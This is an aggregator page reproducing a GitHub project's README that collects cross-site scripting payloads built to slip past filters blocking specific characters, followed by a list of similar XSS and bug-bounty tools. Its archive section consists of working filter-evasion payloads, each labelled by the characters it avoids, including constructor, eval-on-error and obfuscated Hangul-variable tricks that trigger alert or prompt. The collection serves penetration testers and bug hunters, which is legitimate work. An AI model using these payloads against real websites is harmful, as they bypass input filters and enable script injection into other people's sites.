All Projects β†’ hahwul β†’ XSS-Payload-without-Anything

hahwul / XSS-Payload-without-Anything

Licence: other
XSS Payload without Anything.

Projects that are alternatives of or similar to XSS-Payload-without-Anything

Xss Payload List
🎯 Cross Site Scripting ( XSS ) Vulnerability Payload List
Stars: ✭ 2,617 (+3436.49%)
Mutual labels:  xss, xss-vulnerability, bugbounty, payloads
Tiny Xss Payloads
A collection of tiny XSS Payloads that can be used in different contexts. https://tinyxss.terjanq.me
Stars: ✭ 975 (+1217.57%)
Mutual labels:  xss, bugbounty, payloads
Cazador unr
Hacking tools
Stars: ✭ 95 (+28.38%)
Mutual labels:  xss, bugbounty
Hackvault
A container repository for my public web hacks!
Stars: ✭ 1,364 (+1743.24%)
Mutual labels:  xss, payloads
0l4bs
Cross-site scripting labs for web application security enthusiasts
Stars: ✭ 119 (+60.81%)
Mutual labels:  xss, bugbounty
Blackwidow
A Python based web application scanner to gather OSINT and fuzz for OWASP vulnerabilities on a target website.
Stars: ✭ 887 (+1098.65%)
Mutual labels:  xss, bugbounty
Reconftw
reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities
Stars: ✭ 974 (+1216.22%)
Mutual labels:  xss, bugbounty
Quickxss
Automating XSS using Bash
Stars: ✭ 113 (+52.7%)
Mutual labels:  xss, bugbounty
Xspear
Powerfull XSS Scanning and Parameter analysis tool&gem
Stars: ✭ 583 (+687.84%)
Mutual labels:  xss, bugbounty
Payloads
Git All the Payloads! A collection of web attack payloads.
Stars: ✭ 2,862 (+3767.57%)
Mutual labels:  xss, payloads
Xss Loader
Xss Payload Generator ~ Xss Scanner ~ Xss Dork Finder
Stars: ✭ 215 (+190.54%)
Mutual labels:  xss, payloads
vaf
Vaf is a cross-platform very advanced and fast web fuzzer written in nim
Stars: ✭ 294 (+297.3%)
Mutual labels:  xss, bugbounty
Dalfox
🌘🦊 DalFox(Finder Of XSS) / Parameter Analysis and XSS Scanning tool based on golang
Stars: ✭ 791 (+968.92%)
Mutual labels:  xss, bugbounty
Ezxss
ezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting.
Stars: ✭ 1,022 (+1281.08%)
Mutual labels:  xss, bugbounty
Android Reports And Resources
A big list of Android Hackerone disclosed reports and other resources.
Stars: ✭ 590 (+697.3%)
Mutual labels:  xss, bugbounty
Gxss
A tool to check a bunch of URLs that contain reflecting params.
Stars: ✭ 115 (+55.41%)
Mutual labels:  xss, bugbounty
Bxss
bXSS is a utility which can be used by bug hunters and organizations to identify Blind Cross-Site Scripting.
Stars: ✭ 331 (+347.3%)
Mutual labels:  xss, bugbounty
Hackerone Reports
Top disclosed reports from HackerOne
Stars: ✭ 458 (+518.92%)
Mutual labels:  xss, bugbounty
magicRecon
MagicRecon is a powerful shell script to maximize the recon and data collection process of an objective and finding common vulnerabilities, all this saving the results obtained in an organized way in directories and with various formats.
Stars: ✭ 478 (+545.95%)
Mutual labels:  xss-vulnerability, bugbounty
xssfinder
Toolset for detecting reflected xss in websites
Stars: ✭ 105 (+41.89%)
Mutual labels:  xss, bugbounty

XSS-Payload-without-Anything

XSS Payload without Anything.

What is XSS Payload without Anything

When I work for a company or bug bounty, the unexpected hurdle is a protection(xss filter) of special char in the JS(Javascript) area. So I am devising a way to easily solve these problems, and one of the processes is this document.

Let's collect a lot of thoughts and solve our problems.

Concept

It is similar to "Payload all the things" in terms of collecting the payload, but I want to provide a list of payloads with special tag (without char, used char, other..) I plan to make it easy to search and to show what characters (or what they are made of) are unusable.

format

without char: () , '

XSS Payload

// usedchar: 
// author: 
// description: 

without char (Frequently filtered characters)

I have selected special characters that are often blocked.

( ) 
{ } 
, 
"
'
`
[ ]
\ 
/ 
; 
+ 
. 
=

(template): () {} , " ' backtick [] \ / ; + . =

Usage

on Github.com

  1. Ctrl + F >
  2. find your problem char
  3. XSS

on hahwul.com comming soon

Awesome payload

coming soon

Archive

without char: () , " backtick \ / [] {} .

location='JaVaScRiPt:prompt'+document.location.hash[1]+'45'+document.location.hash[2]

without char: () {} , " backtick [] / + .

onerror=eval;throw'alert\x2845\x29';

without char: !backtick

prompt`45`

without char: () {} , " backtick``[] / ; + .

location='javaScriPt:alert\x2845\x29'

without char: " backtick \ / ; .

([,ν•˜,,,,ν›Œ]=[]+{},[ν•œ,κΈ€,페,이,,둜,λ“œ,γ…‹,,,γ…Ž]=[!!ν•˜]+!ν•˜+ν•˜.ㅁ)[ν›Œ+=ν•˜+γ…Ž+γ…‹+ν•œ+κΈ€+페+ν›Œ+ν•œ+ν•˜+κΈ€][ν›Œ](둜+λ“œ+이+κΈ€+ν•œ+'(45)')()

without char: {} , " ' backtick \ / ; + =

[45].some.alert()

without char: () {} , " ' [] \ / ; + =

Set.constructor`alert\x2845\x29`

Submit XSS Payloads

Add issue form or pull Request

XSS Payload:
WithOut: 
Description: 

or ...

Tweet with me @hahwul

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].